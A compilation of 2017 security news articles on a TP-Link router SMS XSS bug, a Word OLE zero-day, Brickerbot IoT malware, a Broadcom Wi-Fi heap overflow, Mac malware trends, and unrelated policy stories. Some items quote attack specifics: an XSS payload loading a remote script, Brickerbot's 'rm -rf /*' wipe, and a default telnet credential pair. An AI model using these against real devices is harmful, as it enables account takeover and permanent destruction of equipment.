STE WILLIAMS

TP-Link’s M5350 3G/Wi-Fi router, has the kind of howling bug that gives infosec pros nightmares.

In what looks like a feature created for developers’ convenience, but left behind when it should have been deleted, the device’s admin credentials can be retrieved by text message.

The discoverer of the bug, a German company called Securai, told Heise.de the issue as a cross-site scripting (XSS) bug triggered by an SMS containing the following attack script:

script src=//n.ms/a.js/script

The device replies with admin username, admin password, its SSID, and its login password.

In the Heise.de piece, Securai’s Jan Hörsch said he discovered the bug by analysing the modem’s firmware.

It’s unlikely that the vulnerability has been patched, since according to TP-Link’s current firmware download page for the M5350, the most-current version is M5350_V2_140115, released in January 2015.

Heise notes that Hörsch has also been having fun with the other usual Internet-of-Things targets – a Panasonic BM ET200 retina scanner whose web interface could bypass security by sending it crafted JavaScript, and a Startech modem with a hard-coded telnet password.

The bugs were revealed at last week’s Kaspersky Security Analyst Summit. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/10/tplink_3gwifi_modem_spills_credentials_to_an_evil_text_message/

A long-ago cartoon in The New Yorker put it plainly: “On the Internet, nobody knows you’re a dog.” If that cartoon had been written today, the caption might have read, “On the Internet, nobody knows you’re a fraud.”

Scam artists, snake oil salesmen, sock puppets, bot armies and bullies – every time we look up, it seems as though we discover another form of dishonesty, grifting grown to global scale via the magnificent yet terrifying combination of Internet and smartphone.

None of that should surprise us. People are wonderful and horrible. The network we’ve built for ourselves serves both the honest and the liar. But we have no infrastructure to manage a planet of thieves.

Navigating this stuff goes well beyond ‘caveat emptor’, into the darkest secrets of spearphishing and social engineering playing on our higher selves for the basest reasons. It’s no longer an African prince offering you a hundred million dollars for your assistance; it’s a customer who carefully noted all her transactions and registration numbers on a Word document she’s enclosed in a very helpful email.

Security has been stretched to the breaking point. If things continue as they have, the costs of connectivity could begin to outweigh the benefits, and at that point, the post-Web civilisation of sharing and knowledge, already fraying, would unwind comprehensively, as people and businesses withdraw behind defensible perimeters and call it a day.

All of this served as subtext – never spoken, yet always front of mind – at the Twenty-Sixth International Conference on the World Wide Web. In some broader sense, this is all the Web’s fault – the shadow of its culture of sharing – so might it be a problem that the Web can fix?

This question obsessed the hundreds of research postgraduates presenting papers and posters at the conference. Insofar as papers presented by the Web’s core research community are a reliable indicator of the future direction for the Web, that future centers on learning how to detect lies.

Detecting false advertisements, bullies, and bots – all of these can be done with machine learning. It can even be applied to a politician’s tweets – to find out if they’ve been fibbing about where they’ve been, and when.

This flurry of research hearkens back to one of the oldest problems in Computer Science – the Turing Test. Can you detect whether someone at the other end of a text-based connection is a person or a computer? What questions do you ask? How do you analyse their responses? Take those same ideas and apply them to a vendor on Alibaba or an account on Twitter – ask the questions, analyse and probe – then decide: truth or lies.

As Sir Tim Berners-Lee won the ACM A.M. Turing Award last week, the timing of this next evolution of his Web could not be more appropriate. The Web needs to grow a meta-layer of error-checking and truth-telling. That will likely slow things down a bit, even as it helps us feel more assured that the fake can be suppressed.

This will never be as true as we might want it to be. As soon as any system to detect lies goes into widespread deployment, the least honest and most clever will go to work undermining that algorithmic determination of truth, finding its weaknesses, and exploiting them. It was ever thus; over the long term, the search for truth will has always been an act of persistence and dedication.

Machines can help us in this battle – but machines will be used on both sides, deceiving and revealing deceit. Yet there is hope: there’s too much money on the table to allow the forces of darkness to gain ascendancy. Chaos is bad for business.

Any alignment of commerce with the greater good is a rare and potent combination, meaning the resources to fight this battle will be available into the foreseeable future. Those graduate students with their fraud and bot detection algorithms will be snapped up by those giant firms whose profits depend on a Web that is truthful enough for commerce. When it comes to truth, what’s good for Google and Facebook is good for the rest of us. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/10/machine_vs_machine_battle_has_begun_to_defraud_the_internet_of_lies/

All eyes will be on Microsoft’s April patch run – due tomorrow – to see whether Redmond gets ahead of a nasty Word zero-day that popped up last week.

The hack exploits Object Linking and Embedding and the FireEye researchers who discovered the bug were working with Microsoft, but were pre-empted by a disclosure from McAfee.

McAfee and FireEye each explain that the attack works all the way up to Office 2016 running on Windows 10.

A nasty aspect of the attack is that unlike many Word-based attacks, it doesn’t ask the victim to enable macros.

A document e-mailed to a victim contains an embedded OLE2link object, and if the target opens the file, winword.exe contacts a remote server over HTTP, and a malicious .hta file disguised as RTF (rich text format).

Once the HTA application is loaded and executed, it terminates winword.exe to hide a dialogue raised by the OLE2link object. It then downloads additional payloads, and loads a decoy document for the user.

McAfee’s post adds: “the attacker gains full code execution on the victim’s machine”, and the bug “gives the attackers the power to bypass any memory-based mitigations developed by Microsoft.”

McAfee’s screenshot of the bug

McAfee says the attack “cannot bypass the Office Protected View, so we suggest everyone ensure that Office Protected View is enabled”.

FireEye says it’s taught its e-mail and network products to detect the attack. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/09/microsoft_word_ole_bug/

If you’re so much an Apple fan that you run Apple Music on Android devices, there’s an upgrade to patch against a man-in-the-middle vulnerability.

Eight months ago, Canadian security researcher David Coomber discovered that Apple Music for Android 1.2.1 and older doesn’t validate the SSL certificates presented when logging into the mobile application and payment servers.

As he writes at Bugtraq, that would allow an attacker to silently collect sensitive user information.

Apple was notified of the bug in August 2016. The fix landed in the middle of last week when Cupertino released Apple Music for Android Version 2.0, which provided a handy distraction, focussing attention on the app’s UI and features. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/10/apple_music_vulnerability/

A new form of attack code has come to town and it uses techniques similar to Mirai to permanently scramble Internet of Things devices.

On March 20 researchers at security shop Radware spotted the malware, dubbed Brickerbot, cropping up in honeypots it sets up across the web to lure interesting samples. In the space of four days, one honeypot logged 1,895 infection attempts by Brickbot, with the majority of attacks coming from Argentina, and a second logged 333 attempts – untraceable as they came from a Tor node.

“The Bricker Bot attack used Telnet brute force – the same exploit vector used by Mirai – to breach a victim’s devices,” Radware’s advisory states.

“Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/’vizxv.'”

The malware targets Linux-based IoT devices running the BusyBox toolkit, and seems to have a particular affinity for Ubiquiti network devices, which have their own security issues. Once inside the operating system, the code starts to scramble the onboard memory using rm -rf /* and disabling TCP timestamps, as well as limiting the max number of kernel threads to one.

Run this code and kiss your device goodbye

Brickerbot then flushes all iptables firewall and NAT rules and adds a rule to drop all outgoing packets. Finally it tries to wipe all code on the affected devices and render them useless – a permanent denial of service.

To block the attack, the key factor is disabling Telnet and changing the device’s factory-set passwords. Radware also recommends using intrusion prevention systems to lock down devices. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/08/brickerbot_malware_kills_iot_devices/

Malware samples sharply increased for Mac OS devices in Q4 2016 as threat actors expand their targets outside Windows PCs, new McAfee report says.

Mac OS malware increased by 247% in the fourth quarter of 2016, according to a new report by McAfee Labs.

The dramatic increase in Apple Mac OS malware samples went from 50,000 in Q3 2016 to about 320,000 in Q4.  

McAfee Labs VP Vincent Weafer says the increase can be partially attributed to hackers setting their sights beyond Windows targets. More people are using multi-platform environments in their homes and businesses, he explains, and attackers are taking advantage.

“The more that happens, the more hackers will ensure their attacks work on various systems,” he says. “It’s a natural extension of how they look at the market and their victims.”

Cybercriminals are expanding their campaigns onto other platforms, going from Windows to Mac OS, iOS, and Android. While PCs remain the target of choice for large attack campaigns, the report shows that they are using the same types of attacks on a smaller scale for different platforms.

(Image: McAfee Labs)

“No platform is immune to attackers,” Weafer  says. “Attackers are taking the time to make their threats multi-platform.”

The biggest driver behind the 247% growth in Mac OS malware was OSX/Bundlore, Weafer says. Bundlore is an installer that combines legitimate apps with offers for third-party apps users may not want. These third-party apps are usually installed by default but may present an “opt-out” option following installation.

Much of the Mac OS malware variants follow patterns similar to malware on PCs. Attackers are going after credentials, banking information, and access into organizations. They’re using misleading applications, remote access programs, info stealers, and ransomware, which saw a large expansion onto Mac platforms last year as well, he says.

Weafer notes the dramatic growth is related to the relatively small number of Mac devices. There are hundreds of thousands of new instances of Mac OS malware, but there are tens of millions on the PC side.

“In general, you see more spikes when you have lower numbers,” he notes. The Q4 spike in Mac OS malware peaked at about 320,000, which equates to about 1.3% of the Windows volume.

The higher numbers from Q4 will likely go down, Weafer continues. This dramatic spike is short-term but malware is increasing overall, year-over-year, with more attacks on Macs, PCs, Android, and iOS.

Malware will continue to increase as the IoT grows and more devices, including cameras and drones, enter the mix. “We’re living in a multi-platform, cloud environment and we need to think about the security of all these systems,” he emphasizes.

The Mac OS malware spike doesn’t mean Mac-heavy businesses should be rethinking their strategies, Weafer continues. Basic security principles are still key and standard precautions should be in place: implementing security software, paying attention to app updates, knowing where data is located, and protecting it with strong and unique passwords.

McAfee’s report also includes insight on Mirai, the botnet that exploited poorly secured IoT devices in October 2016 to launch the largest-ever DDoS attack. In the six months since then, Mirai has infected about 2.5 million IoT devices, McAfee discovered. About five IP addresses are added to Mirai botnets every minute.

Researchers also discussed drivers behind the rise in intelligence-sharing. In general, businesses have been working individually as attackers use open collaboration sharing. Now they are trying to talk and share intelligence as they solve problems.

Related Content:

• 7 Ways Hackers Target Your Employees
• Commodity Ransomware Is Here
• Pegasus For Android Spyware Just As Lethal As iOS Version

Kelly is an associate editor for InformationWeek. She most recently reported on financial tech for Insurance Technology, before which she was a staff writer for InformationWeek and InformationWeek Education. When she’s not catching up on the latest in tech, Kelly enjoys … View Full Bio

Article source: http://www.darkreading.com/attacks-breaches/apple-mac-os-malware-spiked-in-q4-/d/d-id/1328591?_mc=RSS_DR_EDT

Your daily round-up of some of the other stories in the news

Twitter sues US government

Twitter is pushing back against an attempt by the US government to unmask the user behind an account that has criticised President Donald Trump.

The social media platform filed a lawsuit in California on Thursday seeking to block a government order demanding that it reveal who is behind the @ALT_USCIS account, which describes itself as “immigration resistance” and is critical of the president and his moves to restrict immigrants.

Twitter has argued that its users are protected by First Amendment rights to “anonymous or pseudonymous political speech”, reported the Financial Times, and Twitter’s lawyers add that the government hasn’t produced any evidence that a criminal or civil offence has been committed. Reuters reported that the lawsuit claims the records are needed for an investigation into taxes, fines and customs and immigration matters.

Twitter has a history of resisting demands for information from prosecutors about its users, and the ACLU said on Thursday that it was supporting Twitter in the suit.

Google rolls out Fact Check to combat fake news

Hard on the heels of Facebook launching its tools to help users identify “fake news”, Google on Friday rolled out its Fact Check feature around the world. The search giant said it would also be extending the feature beyond its Google News service to Search in all languages.

On its blog, Google said: “When you conduct a search on Google that returns an authoritative result containing fact checks for one or more public claims, you will see that information clearly on the search results page. The snippet will display information on the claim, who made the claim and the fact check of that particular claim.”

Google isn’t carrying out the fact checks itself; they are “presented so that people can make more informed judgments”. Google added: “Even though differing conclusions may be presented, we think it’s still helpful for people to understand the degree of consensus around a particular claim and have clear information on which sources agree.”

It’s a long way from perfect, however: the BBC’s technology reporter, Rory Cellan-Jones, flagged up again a somewhat surprising top hit on a search he did about the invention of stairs: clearly this is one piece of fake news that urgently needs a fact-check.

London transport authority seeks cybersecurity apprentices

London’s transport authority, TfL, has launched a cybersecurity apprenticeship course aimed at school leavers as part of a broader drive to attract young people into software and infrastructure jobs with the organisation.

Paying an annual salary of £17,802, the apprenticeship lasts for two years and applicants must have five GCSEs at Grade C or above, including maths and English Language.

The apprentices will learn how to analyse security threats, spot potential threats and advise on best practice, says TfL, as well as “support and develop the IT security policy … and learn how to carry out technical tasks”.

The job advertisement specifically mentions the growing threat from IoT devices, adding that the “Internet of Things has created an ever-expanding list of technologies which need protection from tampering and hacking to prevent weaknesses being exploited”.

If that sounds like you, applications are due by April 19.

Photograph: Marisa Allegra Williams (@marisa) for Twitter, Inc.

Catch up with all of today’s stories on Naked Security

Follow @NakedSecurity
Follow @katebevan

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/M2RxXtuNiy0/

Earlier this week, we advised iPhone users to waste no time applying the latest iOS update, even though it came out just five days after Apple’s previous, much bigger update.

(The week-before-last’s update was a 700MB blockbuster taking you to iOS 10.3; this week’s was a 30MB point release to 10.3.1.)

The story behind the iPhone 10.3.1 update, however, goes well beyond iPhones in particular, beyond iOS, and even well beyond Apple.

The bug that was fixed in iOS 10.3.1 was found and reported by Gal Beniamini of Google’s Project Zero, but it wasn’t a bug in iOS.

Some of Google’s own flagship phones were affected too – indeed, Beniamini used a Nexus 6P as his guinea pig device during the extensive (and very interestingly described) spelunking he performed while finding and exploiting the hole.

The bug isn’t in the the core operating system itself, such as Android or iOS, or in any of the apps that are installed, and the bug doesn’t even involve running unauthorised program code on the CPU of the device itself.

Instead, Beniamini decided to test the security of the various peripherals used, well, on the periphery of the device.

For example, if you think of a phone as a full-blooded computer, much like your laptop, then that phone is itself connected up to a whole raft of ancillary hardware, such as bluetooth adapters, webcams, cellular modems and Wi-Fi network cards that are essentially Internet of Things (IoT) devices in their own right.

In this research project, Beniamini decided to zoom in on Broadcom Wi-Fi hardware, implemented as what’s called an SoC, short for “system on chip”.

His motivations were straightforward: Broadcom devices are widely used; he could get his hands on technical documentation for the chips (albeit not of the most current versions); and several Google devices use them, including the Nexus 5, 6 and 6P models, so he had a handy supply of test kit, courtesy of his employer.

And, as he himself puts it:

Over the years, as a result of the focused attention by security folk, the defenses of code running on the application processor have been reinforced. [. . .] However, attackers tend to follow the path of least resistance. Improving the security of one component will inevitably cause some attackers to start looking elsewhere for an easier point of entry.

We’ve seen exactly this sort of “security gap” before when comparing desktop apps, such as browsers, which have had years of serious security attention, and mobile apps, which haven’t.

Pwning your Wi-Fi

Biniamini found several vulnerabilities in the Broadcom firmware he chose to look at, but one has hogged the news: CVE-2017-0561.

This bug is what’s known as a heap overflow vulnerability, where memory used by one part of the software tramples on memory used by another.

The heap is the jargon name given to a lump of memory that’s managed by the operating system, with blocks inside the heap allocated temporarily to a process at one point, and taken back when no longer needed.

Without a managed memory heap, every process would need to grab onto the maximum amount of memory it might ever need up front, just in case, which would be incredibly inefficient.

If you can trample process memory in just the right sort of way, you may be able to orchestrate the way the process misbehaves so that you can control what happens next, such as diverting the CPU’s flow of execution into the data in the buffer you just overflowed.

If you can do that, you’ve found a remote code execution (RCE) exploit: without logging in, or entering a password, or going through any other security check, you can take over and run a snippet of malicious software of your choice.

Those snippets of malicious software are known in the jargon as shellcode, where code means executable program instructions, and shell is a metaphor that comes from “command shell”, which is what a command prompt window is called in the Unix world.

Missed opportunities

Thanks to his detailed digging, Biniamini found three modern security practices that Broadcom hadn’t used in the firmware he analysed.

The first missed opportunity is what’s known variously as heap cookies, heap canaries, or safe unlinking.

Simply put, modern operating systems perform all sorts of additional checks when allocating and deallocating heap memory, for example by placing a randomly-chosen data value between the memory blocks that are dished out for use.

This doesn’t stop buffer overflows, and it doesn’t prevent them being exploitable, but it makes the task much harder, and it means that even if an attack can’t be stopped outright, it can often be detected very quickly and mitigated.

Every time the system memory manager is triggered, it can run through the list of allocated memory blocks to look for corruption, such as evidence that the tell-tale marker at the end of each block hasn’t been trampled on, which is almost inevitable in the event of a buffer overflow.

The name “heap canary” comes from the canary that coal miners used to take underground. A canary would faint in the presence of the explosive mine gas methane and fall off its perch, signalling that the shaft was dangerous.

The second missed opportunity is what’s known on Windows as data execution prevention, or DEP for short.

That means using features in the CPU itself to denote which parts of memory contain data, rather than code.

That way, any attempt – accidental or deliberate – to execute code from a location where data was expected can be detected, reported and blocked.

DEP makes heap overflows harder to exploit because you can’t just stick shellcode bytes into your buffer overflow and jump the CPU to it, because the CPU knows that the heap is data, and won’t let it run.

And even though the CPU in the affected Broadcom Wi-Fi hardware is very stripped down (it’s an ARM Cortex R4), it nevertheless has an MPU, or Memory Protection Unit.

You can set up the Cortex R4 so that your available memory is divided into up to 12 regions, each with its own access control parameters.

You can therefore lock down code so it’s executable but not writable, which prevents it being modified unexpectedly; and you can lock down data such as the heap so it’s writable but not executable, which prevents shellcode running from it.

Biniamini discovered that the Broadcom firmware had neatly divided up the 4GB address space (not all the address space has to be populated with actual RAM or ROM) something like this:

Address range            Access control options
-----------------------  ------------------------------
0x00000000 - 0x0FFFFFFF  Readable, Writable, Executable
0x10000000 - 0x1FFFFFFF  Readable, Writable, Executable 
0x20000000 - 0x3FFFFFFF  Readable, Writable, Executable 
0x40000000 - 0x7FFFFFFF  Readable, Writable, Executable 
0x80000000 - 0xFFFFFFFF  Readable, Writable, Executable 

In other words, the firmware went to the trouble of configuring the MPU yet took no benefit from it: memory was split up into five areas open to everyone,.

(Apparently, newer Broadcom Wi-Fi firmware does use the MPU purposefully, meaning that this problem will die out as older devices get retired or updated.)

The third missed opportunity is ASLR, or address space layout randomisation, where both your code and its associated data end up in different memory addresses each time.

The Broadcom Wi-Fi SoC firmware isn’t stored on the chip itself; instead, the main computer installs a copy of the firmware every time the Wi-Fi chip is restarted, typically when the host device is itself turned off and back on.

By rearranging the firmware layout each time, even if only slightly, you make a much less predictable target for a would-be attacker.

For example, in Biniamini’s proof-of-concept code showing how to research and exploit this hole, he relies in numerous places on knowing where in memory certain code and data is going to be, with different hard-wired addresses needed for different firmware versions.

Making the firmware memory map different on every device by randomising it every time the device starts up means that an attacker can’t rely on known addresses.

Once again, ASLR doesn’t make remote code execution exploits impossible – if one part of the system accidentally give away the memory map currently in use, for example, and another part contains a potential remote code execution exploit hole, then the two vulnerabilities can be chained together to form a working exploit.

But ASLR combined with DEP makes the job much harder for the crooks.

Of course, to be fair to Broadcom, for all that the flaws are in Broadcom’s code, the buck doesn’t stop there.

After all, Google, Apple and others who chose to use the affected hardware and firmware in their own devices have to accept their share of responsibility.

This is especially true in the case of locked-down devices like iPhones where you can’t apply your own updates even if you want to: the buggy firmware is loaded from the host device’s own file system, so only the vendor can install the update for you.

What to do?

This RCE exploit can, in theory, be triggered by any other device connected to the same Wi-Fi network as you, but it doesn’t get right inside your device: the crooks are still only the periphery.

Nevertheless, we think it’s a problem to have exploitable Wi-Fi firmware, not least because that’s where all your Wi-Fi data gets shovelled in and out, which is why we recommended patching this bug on your iPhone as soon as possible.

What’s tricky in this case is being sure exactly which devices are at risk: recent iPhones have already been patched, and so have some Google Nexus and Pixel phones, but we can’t give you a list of other devices that might be affected.

The problem is that this particular bug and the current patches for it are more of an example and a symptom than a general fix.

We know that one particular Broadcom Wi-Fi SoC running one version of Broadcom’s proprietary firmware is definitely affected using one of the bugs that Biniamini found, because he published a proof-of-concept to demonstrate it.

But we also know that Biniamini found the “no DEP” problem on a Nexus 5, which didn’t receive a patch from Google; we can guess that the stripped-down heap management code might be in other widespread Broadcom firmware, too; and we can assume that Broadcom SoCs of the same era don’t make use of ASLR, either.

Worse still, Google says it has a second part to this story – a hack whereby an attacker can “pivot” from the Wi-Fi chip to run code on the host device itself – but the company hasn’t published that part yet.

In other words, this bug is potentially serious, but in real-life terms, it’s a bit futile to worry too much about it given the unknown number of combinations of hardware, firmware, host devices and operating systems that might be affected.

If you’re really worried:

• Stick to 3G/4G connections and turn Wi-Fi off while you are out and about.
• Power off and restart your device from time to time, which reloads the Wi-Fi firmware. (Biniamini’s exploit patches the firmware temporarily in memory, not persistently on the host device’s disk.)
• Ask your vendor or carrier for information, and grab any updates as soon as you can.

Follow @NakedSecurity
Follow @duckblog

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/b7Q9l3zz8n4/

A threat to wipe millions of supposedly compromised iCloud accounts and iPhones has yet to materialise. A security expert who has analysed samples of compromised data has concluded that the threat – such as it is – only exposes a small number of accounts to potential credential-stuffing attacks.

The self-styled Turkish Crime Family – the group behind the supposed pwnage – have withdrawn into silence save for a enigmatic tweet from an affiliated account threatening something might go down at 2030 BST tonight. Requests by El Reg to coax a hint of what that might be have been met with silence so far.

The group emerged last month claiming to have gained access to 300 million iCloud and Apple email accounts, threatening to delete account contents and remotely wipe Apple devices unless Apple paid a ransom. Little by way of proof was disclosed publicly to substantiate these claims. The hackers later put it about that they were planning to offer a IMEI and appleid lookup service based on the compromised data, charging $10 a pop.

Troy Hunt – the security researchers behind haveibeenpwned.com (HIBP) – has analysed a sample of 69,000 compromised records via security reporter Zack Whittaker. Eliminating duplicates brings the list down to 53,000.

More than 98 per cent of the email addresses had featured in earlier data breaches loaded into HIBP, implying that the data set had come from existing breaches.

77 per cent of the unique email addresses in the Apple data came from the Evony breach. A further 3,243 email addresses not already found in the Evony data matched perfectly to accounts in the Last.FM breach. The chances of this happening from a random sample taken from hundreds of millions of breached records is minute, allowing Hunt to infer that the supposed multimillion record compromise is nothing of the sort.

“The list of Apple accounts is not hundreds of millions, it is instead less than 53k and it’s compromised predominantly of accounts from the Evony data breach and a small handful of others,” Hunt concludes in a blog post.

Rather than hundreds of millions of Apple accounts being reset and iPhones wiped today, it’s those from a sample of 53,000 records who have reused previously compromised passwords with their iCloud account who are at risk, and even then only if they haven’t changed their Apple login credentials recently.

“Now, that’s not to say there’s no risk at hand here, but rather that the risk is no different to the one we’re faced after every data breach: a bunch of people have reused their passwords and they’re now going to have other accounts pwned as a result,” Hunt explained. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/07/icloud_wipe_threat/

Twitter and the US government’s game of chicken over an anonymous anti-Trump tweeter is over before it barely began.

The Department of Homeland Security today dropped its lawsuit against the social network that demanded the identity of an allegedly “rogue” immigration official blasting the president via the @Alt_USCIS account.

This comes one day after Twitter sued Uncle Sam to stop Customs and Border Protection (CBP) agents from obtaining detailed account information on Alt_USCIS – the “rogue” account that portrays itself as a renegade insider within the United States Citizenship and Immigration Services.

As a result of the US government’s U-turn, Twitter told the Northern California District Court it will no longer need to continue its suit.

“On April 7, 2017, counsel for Defendants from the Department of Justice contacted counsel for Twitter, to advise that US Customs and Border Protection has withdrawn the summons and that the summons no longer has any force or effect,” Twitter wrote in its motion to dismiss [PDF].

“Because the summons has now been withdrawn, Twitter voluntarily dismisses without prejudice all claims against Defendants in the above captioned matter.”

Backers of the suit, including the ACLU, hailed the move as a victory for free speech.

BREAKING: Trump administration backs down from unconstitutional push to unmask @ALT_uscis. Big victory for free speech and right to dissent.

— ACLU National (@ACLU) April 7, 2017

We want to thank @twitter and @aclu for standing up for the right of free anonymous speech. Thank you resistance for standing up for us. https://t.co/6PdwZIJ2xP

— ALT🛂 Immigration (@ALT_uscis) April 7, 2017

Twitter said in its (now dismissed) complaint that a CBP agent showed up at its San Francisco headquarters and invoked a clause in US import laws that would have allowed the official to obtain information on the identity of the person behind Alt_USCIS.

The Twitter lawsuit alleged that not only was the order to unmask its user a first amendment violation, but was in no way related to powers granted by US Code § 1509, which concerns taxation of imported goods.

Apparently the DHS agreed, or at least decided that unmasking the rebel account was not worth a prolonged legal battle at the moment. For the time being, at least, “rogue” government tweeters have prevailed. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/07/us_government_backs_down_on_twitter_unmasking_demand/